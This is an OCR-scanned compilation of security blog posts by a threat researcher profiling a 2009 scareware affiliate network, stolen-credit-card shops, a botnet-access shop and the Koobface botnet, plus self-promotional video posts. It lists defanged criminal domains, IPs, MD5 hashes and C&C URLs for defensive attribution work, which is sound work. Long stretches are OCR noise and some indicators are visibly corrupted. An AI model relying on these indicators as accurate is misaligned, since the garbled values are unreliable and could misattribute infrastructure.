Message Box Object Error 


Video ActiveX Object Error: 
Your browser cannot display this video file. 


You need to download new version of Video Activex 
Object to play this video file. 


To download new version of video decoder click Continue. 


Continue Cancel Details. 


ii KK Wa — «1 oO 


NOTE: 
| took these screenshots in 2009. 
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It used to be a moment in time when scareware and pay per install affiliate-based revenue 
sharing fraudulent and malicious networks used to dominate the threat landscape as the pri- 
mary monetization vector courtesy of the bad guys where they’ve managed to successfully 
steal basically tens of thousands in fraudulent revenue by enticing users into installing and 
interacting with rogue and fake security software. 


In this post I’ll take a deeper look inside the YaBucks rogue and affiliate-network based scare- 
ware serving network that managed to affect thousands of users globally largely based on 
the number of affiliates that participated in it including to also provide technical details on its 
Internet-connected infrastructure with the idea to assist everyone in their cyber attack and 
cyber campaign attribution efforts. 


Sample screenshots include: 


[2] 


WARNING! 


AdwareHelp 2009 problems in your INTERNET privacy and security! 


Information is available for everyone! Information on your PC is available for everyone! 
IP Address: 209.222.78.162 Files Stored on This Computer « 
System Tasks 
Location o— ! 
Browser: [2) view system information i) My Do " fi 


os: & Add or remove programs 


Bp Change a setting 
AdwareHelp 2009 protects your DATA and FILES, Hard Disk Drives 
PERSONAL INFORMATION, AGAINST VIRUS 

ATTACKS, and KEEPS YOUR PC CLEAN! Other Places 


» 


xp Local Disk (C:) 
v 


GQ my Network Places 


IT'S DANGEROUS! 


[3] 
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kalender.sttmedia .se/amalzingdemOnstratiOn 
kartingclubsourdsnamur .be/besttw 
kiding.users.digital-crocus .com/mmymOvies 
kloerfem .dk/amalzIngshOw 

kracl .com/freeeshOw 

kreativdizajn .com/amalzingvids 

ktvsongs .com/publicacti0On 

lonestargcs .com/mmydwd 
losangelesfurniture .com/fantasticdemOnstratiOn 
Ir-online .dk/cOOlfilms 

Ir-online .dk/yOurshOw 

marketmarkj .com/privalemOvies 
martinhorngren .com/privalettube 
meetingpacket .com/youtube.com 

microscoop .net/fantasticttube 
momentsbypat .com/publicmOvie 


mtn-ejendomme .dk/mmyactiOn 
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Me - AdwareHelp 2009 | onli 


WARNING! 
Protect your systeng - 
Automatic system s| 


Do you want to run of save this file? 


i "| Name: 02d79.exe 
Type: Application, 32.5KB 


From instaliz.cn 


Run Save | Cancel 


Scan status: Threat Detected 


Checking files: 64 While files from the Internet can be useful, this file type can =m 


Potentially harm pour computer. If you do not trust the source, do not 
tun of save this software. What's the nsk? 


% Suspicious files: 2 


Protection status: Low Protection Leve 


Frewal Not installed 

Antivirus Protection Not found 

Internet Browser Protection Not found 

Mail Protection Not installed 
[4] 


VyrevurmeVeWT Ty re rey 


SEND MESSAGE 


[5] 
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SHOUTBOX 


harroinc|2009-04-16 11:44:25} 
www .pay-per-install_org LOLS 
hip /adware-help convprorr 1) 5 = archive with script and installation ins 


02d7957d76a64ic1e777c8829599a2e1 - key to use in installabon proc 


J have own hosting and host it It's 


NEWS “stars” PROMO TOOLS PAYMENTS ACCOUNT SUPPORT LOG OUT 


STATS 


From 


SHOUTBOX 


To 

2009-04-41 

a0ee-OEIE harroinc[2009-04-16 11:44:25) 
www .Day-per-install. org LOLS 


Sample domains known to have been involved in the campaign include: 


hxxp://pontesmedia.com - 74.54.241.100 


hxxp://matelab.com 
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hxxp://legochild.com 
hxxp://imzee.com 
hxxp://mustmake.com 
hxxp://ovobundle.com 
hxxp://emulehome.com 
hxxp://skyaffiliate.com 
hxxp://vivosearch.com 
hxxp://ovocash.com 
hxxp://p2passion.com 
hxxp://datingnoon.com 
hxxp://profilissimo.com 
hxxp://flipero.com 
hxxp://adware-help.com 
hxxp://spacextender.com 
hxxp://mybuckler.com 
hxxp://iframr.com 
hxxp://glintgames.com 
hxxp://justares.com 
hxxp://ppitalks.com 
hxxp://theinstalls.com 
hxxp://adwaredollars.com 
hxxp://funtarget.com 
hxxp://theimageoutlet.com 
hxxp://petduet.com 
hxxp://tivisoft.com 
hxxp://softpont.com 
hxxp://blogency.com 
hxxp://wiiactivity.com 
hxxp://bnetworks.us 
hxxp://gorasoft.us 
hxxp://camerabid.net 
hxxp://freemediashare.net 
hxxp://germek.net 
hxxp://imupdates.net 


hxxp://allworldstars.net 


26125 


hxxp://gorasoft.net 
Sample responding IPs known to have been involved in the campaign include: 
hxxp://54.208.174.161 
hxxp://154.72.193.28 
hxxp://54.165.156.210 
hxxp://54.200.75.96 
hxxp://52.72.89.116 
hxxp://199.184.144.27 
hxxp://74.208.236.241 
hxxp://74.208.21.90 
hxxp://207.148.248.143 
hxxp://50.63.202.104 
hxxp://184.168.221.39 
hxxp://52.202.22.6 
hxxp://54.209.32.212 
hxxp://54.208.74.215 
hxxp://45.40.140.6 
hxxp://68.178.213.203 
hxxp://213.186.33.18 
hxxp://3.223.115.185 
hxxp://52.71.210.200 
hxxp://23.20.239.12 
hxxp://54.80.72.81 
hxxp://34.102.136.180 
hxxp://146.112.61.107 
hxxp://204.11.56.48 
hxxp://23.202.231.167 
hxxp://23.217.138.108 
hxxp://107.23.198.240 
hxxp://35.171.109.224 
hxxp://52.7.6.73 
hxxp://52.71.185.125 
hxxp://54.174.212.152 
hxxp://52.6.224.208 
hxxp://54.209.58.131 
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hxxp://3.224.108.191 
hxxp://34.206.145.143 
hxxp://18.119.154.66 
hxxp://217.160.0.202 
hxxp://72.32.183.55 
hxxp://13.70.194.134 
hxxp://52.50.218.98 
hxxp://52.19.184.19 
hxxp://156.245.122.96 
hxxp://154.38.221.164 
hxxp://180.215.252.181 
hxxp://52.16.207.139 
hxxp://192.163.249.115 
hxxp://54.183.99.63 
hxxp://46.249.46.67 
hxxp://146.112.61.106 
hxxp://23.202.231.168 
hxxp://23.195.69.108 
hxxp://185.230.63.171 
hxxp://185.230.63.186 
hxxp://109.234.109.84 
hxxp://192.232.231.38 
hxxp://50.63.202.47 
hxxp://50.63.202.49 
hxxp://50.63.202.59 
hxxp://198.105.244.11 
hxxp://184.168.221.57 
hxxp://185.230.61.173 
hxxp://184.168.221.36 
hxxp://104.239.213.7 
hxxp://34.117.168.233 
hxxp://85.13.164.142 
hxxp://185.230.60.173 
hxxp://199.34.228.59 
hxxp://103.224.182.244 
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hxxp://36.86.63.182 

hxxp://184.168.221.65 
hxxp://185.205.210.23 
hxxp://204.16.144.135 

hxxp://172.93.51.245 

hxxp://76.223.65.111 

hxxp://184.168.221.53 

hxxp://218.93.250.18 

hxxp://184.168.221.40 

hxxp://93.89.226.17 

hxxp://54.72.11.253 

hxxp://198.105.254.11 

hxxp://18.211.9.206 

hxxp://185.53.179.7 

hxxp://91.237.88.232 

hxxp://52.15.160.167 

hxxp://3.140.179.210 

hxxp://3.141.79.17 

hxxp://198.61.166.153 

hxxp://69.56.252.44 

hxxp://143.95.87.47 

hxxp://104.24.126.199 

hxxp://50.63.202.43 

hxxp://23.246.252.106 

hxxp://141.8.226.19 

hxxp://3.143.123.90 

hxxp://3.138.54.87 

Sample malicious MD5s known to have been involved in the campaign include: 
MD5: d308labe4e1c1808e5e8a83a3bcleaa2 
MD5: laadbc70670bc05875c04c9e86c0356e 
MD5: f18c7a4fed30371a0eba7eef3051234f 
MD5: b492493154482d9bb6e24340d8866dec 
MD5: 72e5a2dadc0711f36e84f636b7267b1b 
MD5: eab74844a9b34edc1b7b3d4e84aab5ec 
MD5: 322367ea2f686916a44181bf72c49726 
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MD5: d9f6bf40003d44ecf7b2fa697a9e7 3dd 


Sample malicious and fraudulent C &C server domains known to have been involved in the 
campaign include: 


hxxp://skyaffiliate.com/count.php 
hxxp://funtarget.com/?m &id=61fbd50a-ef75-11e8-bc2f-00c0a8850c2a &ver=9 
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18.10.33 Exposing a Compilation of Stolen Credit Cards Selling Domains - An Analy- 
SiS (2022-10-29 01:56) 


[1] 
BINs: Last4dig: Country: Bank: Code Level: CredivDeba: Type: Base: 
(+81 $15 “$1 
Cards found: 840 
BIN Exp Country Bank Level Credit/Debit Code TRUTR2 Price 


asec 


401666 
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Dear blog readers, 


I’ve decided to share with everyone a currently active portfolio of E-Shops selling access to 
stolen credit cards including the necessary technical information to assist everyone in their 
cyber attack and cyber campaign attribution efforts. 


Sample screenshot includes: 


sa~~ Za a Za —a~ La~ 
@) @®) @) @) @®) @®) 
n prvateshop2.com pewateshop1.com pawnshOp com noviops.com Zunosiores.com validforver.com 


Sample domains known to have been involved in the campaign include: 


hxxp://ccgetmoney.com 
hxxp://cvvshop.in 
hxxp://cvvshop39.com 
hxxp://evilshop.org 
hxxp://shopccdumps.com 
hxxp://trackgenerator.com 
hxxp://validforver.com 
hxxp://zunostores.com 
hxxp://noviops.com 
hxxp://pawnshOp.com 
hxxp://privatecvv.com 
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hxxp://privateshop1l.com 
hxxp://privateshop2.com 
hxxp://selldumpsshop.com 
hxxp://allmybins.com 
hxxp://anyccard.com 
hxxp://bases-valid.com 
hxxp://batch-conf.com 
hxxp://yalelodge.com 
hxxp://vietnamworm.com 
hxxp://freshcvv.com 
hxxp://good-cvv.com 
hxxp://dumpschecker.com 
hxxp://jshop-pro.com 
hxxp://dumpscvv2.com 
hxxp://trdoz.com 
hxxp://cyberxshOp.net 
hxxp://validmarket. biz 
hxxp://cvvhack.com 
hxxp://bulkcvv.com 


Sample personally identifiable email address accounts known to have been involved in the 
campaign include: 


greg2022@maail.ru 
philmahre1989@gmail.com 
Sample screenshots include: 


[3] 
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EXCLUSIVE UPDATE! FRESH ARRIVAL!! 


- 
~asil Pi 


Authorization 


JOKER'S STASH JSTASH.BAZAR THE 
BIGGEST DUMPS & CVV SHOP 


Registration 


[7] 
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nadiottawa .org/publicclips 
naestved-sportscollege .dk/amalzingactiOn 
nicalandnow .com/uncensOredvids 
odyssey-consultants .com/amalzingvideO 
odyssey-consultants .com/mmymOvie 
onlyfun .se/extrimec1lip 

pridesoccer .com/privaleclips 
quicksilver-direct .com/amalzingfilm 
reddoorchina .com/mmyvlids 

relivery .com/extrimeshOw 


ristorocasanova .it/youtube.com 
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BUY VISA CLASSIC CREDIT CARDS VALUE (CVV) + PIN ONLINE 


[8] 


/ ZINN 
= | : \ SHOr 
Zi iM | % | 


Ai) 
M14 | Ai 


[10] 
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Welcome! 
Please register or log in 


E-mail 


Password 


Captcha 


Register 


[11] 


HIGHETS QUALITY DUMPS BY DONALD TRUMP! 
Ta*T2- DUMPS / CVV 


[12] 
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Login Area Credit Cards Dumps Shop 


Authorization 


CREATE ACCOUNT 


Sample responding IPs known to have been involved in the campaign include: 


hxxp://92.53.77.40 
hxxp://92.223.105.218 
hxxp://47.254.213.246 
hxxp://49.51.135.48 
hxxp://78.155.206.161 
hxxp://149.129.136.245 
hxxp://47.74.235.179 
hxxp://92.38.135.246 
hxxp://149.129.136.150 
hxxp://149.129.225.92 
hxxp://37.60.177.31 
hxxp://194.87.103.196 
hxxp://185.162.131.59 
hxxp://149.129.223.249 
hxxp://161.117.7.46 
hxxp://46.21.248.49 
hxxp://47.91.72.137 
hxxp://185.185.69.33 
hxxp://119.28.41.158 
hxxp://85.193.85.119 
hxxp://92.53.66.13 
hxxp://47.74.176.216 
hxxp://95.163.250.153 
hxxp://47.74.236.158 
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hxxp://95.213.252.108 
hxxp://49.51.192.130 
hxxp://178.154.240.197 
hxxp://172.67.144.190 
hxxp://27.102.118.142 
hxxp://80.87.97.201 
hxxp://149.129.219.23 
hxxp://185.158.152.31 
hxxp://49.51.35.225 
hxxp://35.198.119.28 
hxxp://108.177.235.227 
hxxp://193.187.128.60 
hxxp://47.74.186.197 
hxxp://92.53.77.90 
hxxp://149.129.215.190 
hxxp://47.74.137.231 
hxxp://45.149.222.144 
hxxp://185.167.98.134 
hxxp://104.165.20.149 
hxxp://47.52.233.0 
hxxp://45.34.127.236 
hxxp://95.213.252.3 
hxxp://143.110.176.81 
hxxp://47.88.156.38 
hxxp://46.21.249.114 
hxxp://159.65.94.111 
hxxp://185.223.163.129 
hxxp://185.224.212.24 
hxxp://185.162.131.61 
hxxp://119.28.137.123 
hxxp://49.51.85.205 
hxxp://194.116.216.254 
hxxp://5.188.89.114 
hxxp://5.188.89.22 
hxxp://194.87.235.166 
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hxxp://92.38.135.251 
hxxp://172.104.104.241 
hxxp://95.213.203.64 
hxxp://45.63.40.156 
hxxp://149.129.216.197 
hxxp://47.88.231.35 
hxxp://78.155.207.76 
hxxp://138.68.70.125 
hxxp://185.142.239.239 
hxxp://85.119.150.130 
Related domains known to have been involved in the campaign include: 
hxxp://stdumps.com 
hxxp://shopcvvonline.ru 
hxxp://golddumps.net 
hxxp://hitbtctrading.com 
hxxp://try2swipe.shop 
hxxp://dumps-cvv.ru 
hxxp://dumps-market-cvv.ru 
hxxp://carderunion.ru 
hxxp://cvv-carder-shop.ru 
hxxp://greatdumps.net 
hxxp://cvvunion.su 
hxxp://dumps55.com 
hxxp://okcoin-exchange.com 
hxxp://dumpsmall.com 
hxxp://vaildcc.su 
hxxp://dumpsmall.name 
hxxp://cardingmafia.su 
hxxp://freshtools.ru 
hxxp://http-mshop-metro-cc-ru-shop-authloading.ru 
hxxp://cvv-shop.online 
hxxp://dumps4free.ru 
hxxp://cvvbuyonline.ru 
hxxp://nlshop.net 
hxxp://cardersvilla.com 
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hxxp://stdumps.net 
hxxp://validcvv.club 
hxxp://sellcvv.shop 
hxxp://vaultmarket.name 
hxxp://swiped1.ru 
hxxp://store-best-dump.ru 
hxxp://shop-forum-carder.ru 
hxxp://carder007.shop 
hxxp://crimenetwork.club 
hxxp://cvvonlineshops.com 
hxxp://verifiedshop.su 
hxxp://onlinecvv.ru 
hxxp://shalom.pro 
hxxp://dump99.com 
hxxp://bestcardersforum.ru 
hxxp://smartstripe.ru 
hxxp://dumps-cvv-market.ru 
hxxp://zzxqsc.cn 
hxxp://cardingmaestro.com 
hxxp://cykkk.com 
hxxp://c4rdforallove.com 
hxxp://center-vinyl.ru 
hxxp://cvvonlineshop.ru 
hxxp://cvvshop39.com 
hxxp://pack-relocation.com 
hxxp://evilshop.org 
hxxp://shopccdumps.com 
hxxp://trackgenerator.com 
hxxp://validforver.com 
hxxp://xakerforum.ru 
hxxp://legitvendors.su 
hxxp://e-obmen.su 
hxxp://cardersvilla.ru 
hxxp://kimoyo.net 
hxxp://prtship-forum.ru 
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hxxp://ccguru.su 
hxxp://dpscc.ru 
hxxp://ccgetmoney.com 
hxxp://bulkcvv.com 
hxxp://cvvshop.in 
hxxp://carders-place.com 
hxxp://vault-dumps.com 
hxxp://cvv2shop.su 
hxxp://cproforum.com 
hxxp://vppspy.com 
hxxp://binswork. biz 
hxxp://valid4you.com 
hxxp://realjabba.com 
hxxp://cardstorm.ru 
hxxp://globalccsource.ru 
hxxp://ccshoponline.com 
hxxp://rafanji.com 


hxxp://tonyblack.ru 


hxxp://market-dumps-cvv.ru 


hxxp://allcarders.info 
hxxp://mgmt.niii.in 
hxxp://cvvshop39.ru 
hxxp://pp24.su 
hxxp://approvedcc.com 
hxxp://infraud.ws 
hxxp://ios.z6xg.cn 
hxxp://fraudsmarket.com 
hxxp://verifiedcarder.com 
hxxp://validfullz.info 
hxxp://store-carder-cvv.ru 
hxxp://promarket.ws 
hxxp://blackamex.ru 
hxxp://shopadmin.ru 
hxxp://feshop-one.su 


hxxp://dumpscheck.ru 
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hxxp://card-room.cc 
hxxp://ccfullz.su 
hxxp://dumpschecker.com 
hxxp://swipers.ru 
hxxp://101blackcard.com 
hxxp://stardumps24.ru 
hxxp://dumpscvv2.com 
hxxp://hackerimpossible.su 
hxxp://verifieddumpsshop.ru 
hxxp://track2.su 
hxxp://worldcvv.com 
hxxp://mafiastore.su 
hxxp://trdbz.com 
hxxp://jnpsgo.bar 
hxxp://cyberxshOp.net 
hxxp://vt-professional.com 
hxxp://batch-conf.com 
hxxp://brocard1.com 
hxxp://yalelodge.com 
hxxp://verifiedshop.biz 
hxxp://vietnamworm.com 
hxxp://mymarket.su 
hxxp://cc-best.top 
hxxp://verifed-cardershop.top 
hxxp://fercoamildhubti.cf 
hxxp://onlineg-track.top 
hxxp://goldplastic.store 
hxxp://infraud.name 
hxxp://geobiniri.tk 
hxxp://kingscard.su 
hxxp://validmarket. biz 
hxxp://cvvhack.com 
hxxp://sellccvs.ru 
hxxp://dumpscvvmarket.ru 
hxxp://thugcarders.com 
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hxxp://valid-shop.com 
hxxp://shopvl.net 
hxxp://ccplaza.club 
hxxp://diamonddumps.com 
hxxp://Iswjsdcf358.com 
hxxp://sellz-market.ru 
hxxp://approved1.net 
hxxp://legitcarders.com 
hxxp://darknetwOrk.ru 
hxxp://oroboros.su 
hxxp://freshstuff.cc 
hxxp://bitkonan.net 
hxxp://sellz-market.org 
hxxp://crimemarket.su 
hxxp://myccroom.ru 
hxxp://cvvl.me 
hxxp://sounic.cc 
hxxp://codesellz.com 
hxxp://dcshop.su 
hxxp://free-cc-dumps.ru 
hxxp://brocard2.com 
hxxp://zhilem.com 
hxxp://pawnshOp.com 
hxxp://kairui999.com 
hxxp://privateshop1.com 
hxxp://privatecvv.com 
hxxp://just-valid.com 
hxxp://selldumpsshop.com 
hxxp://allmybins.com 
hxxp://anyccard.com 
hxxp://zunostores.com 
hxxp://novlops.com 
hxxp://good-cvv.com 
hxxp://jshop-pro.com 


hxxp://storecardercvv.ru 


26141 


lath 
— 
aS 
H 
bp [Lect 
o 'd 
mw) Xn 
fa 
a. 
rae 
Qiv 
a) oO 
ces 
Elo 
NOK 
or loa 
wo 
KE 
aie 
H 
Qs 
os | a 
mo 
qi 
ne) 
a | oO 
=a iB 
Q ict 
@ 8 
ict 
Paine 
| RO) 
|B 
=| es 
=< ik 
Hs 
bt 09 
NS 
4H os 
a HS 
Qa ® 
ON 
hy | O 
zis 
aa 
H 
m | 
H 
™~ 
Pad 
< 
< 
al 
n 
i] 
e 
Q 
fal 
y 
=I 
c 
Pad 
fo) 
Q 
< 
w 
oe) 
Es] 
< 
= 
a 
N 
i} 
=| 
qa 
o 
(ox 
n 
qa 
wn 
aS) 
i=7 
es 
N 
n 
= 
@ 
c 
o1 
c 
4 
ys 
is] 
# 
n 
oO 
— 
is 
re, 


=2'N 
|: 
|e 
aia 
Oo 
Hy || 
On 
- Toll. 
oOo I™N 
Alo 
o 
li 
= | 
Fe 
(0) 
oR 
<i}. 
ak 
fy |\08 
ele | 
mie 
318 
io) 
Do 
vars 
a) B 
-Q |i ct 
ES 
tw oct 
oa |: 
2/8 
fa] 
un 8B 
a 
ret || ee 
2 | da 
o||™ 
of 
ano™m 
RS 
x oO 
BN 
Mx ND 
Nm 
H 
™~ 
Pad 
< 
<g 
al 
n 
fH 
pe 
is] 
N 
H 
o 
hare 
fan] 
is 
Bp 
ol 
n 
Q 
fo) 
oO 
is 
+Q 
a 
Q 
Qa 
7 
n 
=a 
<q 
a 
Q 
° 
oO 
> 
=} 
Bp 
w 
Qa 
o1 
x 
(52 
qe 
H 
o 
wm 
Qa 
© 
q 
ad 
an 


OG WwW 
wy 
2 |e 
ele 
= 
13 
x | a 
mr || 
wa oS 
N|o 
wit 
o |° 
HS (OQ 
bq | 00 
Q oO 
FomniEn 
Kh 
ty 09 
|] Oo 
|| o 
by 00 
Hie 
wo oO 
al 
So 
ella 
> 8 
Pa ct 
oo 
a. 8 
tS | ct 
Hila 
Q)o 
0||B 
NOo™ 
25 
Sac 
Lic 
RoUN~ 
ra) 
bd NM 
Hy || © 
aa 
aos 
x 
H 
Ss 
Pad 
< 
<g 
fal 
n 
fH 
=" 
oO 
si 
0a 
‘Uv 
= 
NO 
Qa 
w 
ue) 
N 
Pad 
= 
x 
o1 
Ee) 
4 
Hy 
N 
4 
N 
ps) 
wn 
aQ 
‘U 
bal 
gq 
(op) 
o>) 
i 
N 
H 
o 
Gq 
oe) 
B 
x 
(0) 
ct 
a 
Sm 
x 
q 
ie 
ae] 
O 


Ww) 
ct 
Ga 
ue! 
n 
~N 
~N 
ion 
HH 
° 
{je} 
(je) 
0) 
a 
(ee) 
° 
te) 
0a 
hb 
0) 
i] 
n 
0) 
4 
fa) 
° 
B 
ct 
0) 
5B 
ct 
fa) 
° 
B 
~N 
bE 
B 
0a 
N 
ion 
~N 
es) 
ie) 
oO 
< 
N 
Nit 
veil 
H 
~N 
> 
< 
< 
Pad 
n 
ez) 
a 
i] 
oO 
<4 
a 
<4 
Qa 
Q 
5B 
At 
\=5 
! 
<4 
(er) 
io] 
Qa 
p< 
Q 
cal 
or) 
T 
th 
B 
=] 
Es) 
is) 
i) 
H 
w 
q 
< 
Hh 
fas} 
S 
re 
p< 
H 
nN 
oO 
fe] 
N 
> 
on 
qa 
wo 
IN 


BQVSNoRK6CK9_TBXrd7oKzi9XedYxbo4ybR9k4EaDWzauZ3Ti IBDH: 
ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEhI0VSaEf x6SYCt 7UKUrooVOWoPbBJ_WP5RLgi8_oEC1ZGe0 
ek6ntXfpH75ai VHxf OgahM3C30-w_7FMzoWs9sYF2RIrhi9rdfNv; 
M6YmdIDOq1noR2r0Zi1Q03J8MiJ8D11qiBSnIo74JFCcOicPh_91F 
https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEiW-TBuurpsdsYXoUHdav4u6q7kj1lis4wJUY6DMQFPpguFW 
YW2Ja7e-4LxQ81WNUZ1KxZPpC3KdvtHjF620rhYhNI9x21pM7sOUH 
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NOTE: 
| took these screenshots in 2009. Dear blog readers, 


I’ve decided to share with everyone some screenshots of a E-Shop for selling access to com- 
promised PCs. 


Largely thanks to a variety of built-in botnet management and control features today’s modern 
botnet masters are fully capable of renting or offering access to malware-infected hosts which 
could be used for a variety of purposes which include the hosting of rogue and malicious content 
including the actual use of these hosts to further spread malicious software largely thanks to 
a variety of segmentation features currently available in a variety of high-profile malicious 
software and botnet releases. 


Sample screenshots include: 
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Stay tuned! 
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18.10.35 Thank You For Following Me! (2022-10-29 20:13) 


[1] 


FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 
mail: dancho.danchev@hush.com 


Dear blog readers, 


| wanted to take the time and effort and say big thanks to everyone who’s been following my 
work throughout the years and continues to do so. Full video [2]here. My RSS feed [3]here. 
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Stay tuned! 


1. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEgV_3L8nqaeeWeo_rQgfrWV2gAD4VqHV5PqbGIDbOV3g_ L1I 
TBw2t 4bXW7a9BCoUYvmjs9tEWNBQ_AcFbdPnznOHTOtomiVSRJLZpe 


2. https: //www. youtube .com/watch?v=sHTY1ZyTqYo 
3. https: //feedpress.me/DanchoDanchevOnSecurityAndNewMedia 


18.10.36 Dancho Danchev’s "Exposing the Koobface Botnet" - YouTube Video Pre- 
sentation - An Analysis (2022-10-31 07:01) 


[1] 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 
mail: dancho.danchev@hush.com 


Dear blog readers, 


I’ve decided to share with everyone my Keynote at CyberCamp 2016 on tracking down and 
monitoring the Koobface botnet. 


Go through the related posts [2]here. 


Enjoy! 
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vivaipirovano .com/youtube.com 
xanchise .com/cOOlc1lip 


yurafting .com/amalzingvids 


[19]Sampled Koobface binary now phones back to bianca.trinityonline .biz/.sys/?action=Idgen 
&v=14 and bianca.trinityonline .biz/.sys/?action=Idgen &a=590837698 &v=14 &l=1000 &c 
_fb=0 &c ms=0 &c hi=0 &c tw=0 &c be=0 &c tg=0 &c nl=0. 69.163.147.203 - Email: 
email@darrenjames.net, with the latest Koobfae update modules detected as follows - 
61.235.117.83 /bin/[20]v2prx.exe; 61.235.117.83 /bin/[21]pp.12.exe 


The "Koobface botnet and the 40 cybercriminals" (2008 ali baba and 40 , LLC) have not 
just started monetizing the infected hosts, they’re using multiple layers of monetization to do 
SO. 


Related posts: 

[22]Movement on the Koobface Front - Part Two 
[23]Movement on the Koobface Front 

[24]Koobface - Come Out, Come Out, Wherever You Are 
[25]Dissecting Koobface Worm’s Twitter Campaign 
[26]Dissecting the Koobface Worm’s December Campaign 
[27]Dissecting the Latest Koobface Facebook Campaign 


[28]The Koobface Gang Mixing Social Engineering Vectors 


This post has been reproduced from [29]Dancho Danchev’s blog. 


1. http: //blog.trendmicro.com/pick-your-poison-koobface-or-fakeav/ 

2. 
3. http: //ddanchev. blogspot .com/2009/07/diverse-portfolio-of-fake-security_27.htm 

‘ 
5 
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Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhaGSHSQGe8vyAnMPIu_tGfCOvQzEr46pVdHxxINJyeANGWe 
pivL7BcMb6FMNrvh_QybfDTYFVOnENT-spasciiXcKmosB1041-vE8 
2. https://ddanchev. blogspot .com/search/label/Koobface 


18.10.37  Dancho Danchev Speaks! - YouTube Video Presentation - An Analysis 
(2022-10-31 07:03) 


[1] 


EFROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 
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Dear blog readers, 


I’ve decided to share with everyone my "Dancho Danchev - Speaks!" introduction video where 
| did my best to elaborate more on my experience and expertise in the field throughout the 
years. Enjoy! 


DANCHO DANCHEV 
SPEAKS! 


The World's Most Popular and Often Cited Security Blog! 


Stay tuned! 


1. https://blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEghbK6W3B-rFuSL2- TSNL3GWvu6MXZhnr VvaG8WDSZeBfzo00 
a26i4cgr9Jt JPb34WDdRZPBBUMShzMP_qZYHXcHbJf3RjfYEqfhw 


18.10.38 Dancho Danchev InFraud Organization - YouTube Maltego Demonstration - 
An Analysis (2022-10-31 07:06) 


[1] 
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FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 


Dear blog readers, 


I’ve decided to share with everyone my InFraud organization analysis Maltego training video 
with the idea to assist everyone in their cyber attack and cyber campaign attribution efforts. 


Enjoy! 


Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEj-XDVCtFr8fdEKOELW_XJq_yqs1NleMdW4VOD19RAUOEf6S 
liq_7XJGpS81VgrLtxQwrDvc2ziVjRWSiAgjV2cyg01kCxIZNIoyLV 
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18.10.39 Dancho Danchev SecondEye Solutions - YouTube Maltego Demonstration - 
An Analysis (2022-10-31 07:08) 


[1] 


FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 


Dear blog readers, 


I’ve decided to share with everyone my SecondEye Solutions Maltego training video with ev- 
eryone with the idea to assist everyone in their cyber attack and cyber campaign attribution 
efforts. 


Enjoy! 


MUJTABA RAZA 


BR 
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Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgzGj ZuuENBZpLj01UNwKu-QrPiALdI64gvJinmJZqt40NeK 
4mqb_f_Xp9_dnaPoOxZLrhinHcoysiv-ZPinTZ8TOclysEULmPtr2Z 


18.10.40 Dancho Danchev - Official Come Back - YouTube Video - An Analysis 
(2022-10-31 07:09) 


[1] 


Dancho Danchev's Vlog +t = A 4 
opic: "Psychedelic Reality" pees | 1 wy. i oe eae 


ost: Dancho Danchev 
osition: Independent Contractor a 


— 


eb Site: https://ddanchev.blogspot.com a J — 


Dear blog readers, 


I’ve decided to share with everyone an official Come Back video with the idea to signal the fact 
that I’m indeed back online doing research and that | wanted to say big thanks to everyone for 
following me. 


Enjoy! 
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wei. BANDICAM com 


Stay tuned! 


1. https: //blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEidSh6MRtk_oym49d010fikJmmlkyxXV-CgXacktHrHn1MgG 
QUO6KtrMDvp_o8elY9cIt1QZtIX7YYXE8ueMMaVoxFxWpGciuM2e18 


18.10.41 Do You Want to Become Guest Blogger or Post a Guest Post Here? 


(2022-10-31 07:12) 


[1] 


FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 


Dear blog readers, 


Are you interested in becoming a Guest Blogger or post a Guest Post on the topic of cybercrime 
research OSINT threat intelligence gathering malicious software and botnet research including 
anything related to information security in terms of a Guest Post or to actually becoming a 
full-time Guest Blogger at my personal blog? 


Drop me a line at dancho.danchev@hush.com to discuss. 


Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEg_AH4wHOdSzRLEKa1TZlzvqy88MwqtCzDHVKUYYf£7J7S9Z6 
uGfKQNNdd90mH j 6qqDUEgaF-HspGgarziA5fZxpN9c39KVLn3RaTgp 
18.10.42 Dancho Danchev’s Vlog - Psychedelic Reality Session - YouTube Video - An 


Analysis (2022-10-31 07:12) 


[1] 


EROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 


Dear blog readers, 


I’ve decided to share with everyone one of my most recent YouTube videos which is basically 
a "Psychedelic Reality" short mix with the idea to say big thanks to everyone for following me 
and that I’ll continue to post high-quality research and posts here. 


Enjoy! 
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Dancho Danchev's Viog 
Topic: "Psychedelic Reality" 
Host; Dancho Danchev 
Position: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 
Email: dancho.danchev@hush.com 


Stay tuned! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEjKgk6aAWgho7 qbud j FGqHH8e6S0i13loAyVqzhRi JCKRFMb 
BD3gJHWxSO0a0aZy6f7TMY1sKNPUz_B1iNE_nbB-VO09vmi17J_vzx 


18.10.43 Profiling a Russia-Based Bulletproof Hosting Provider - An Analysis 
(2022-10-31 10:53) 


[1] 
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Ratecreere roc Tver 


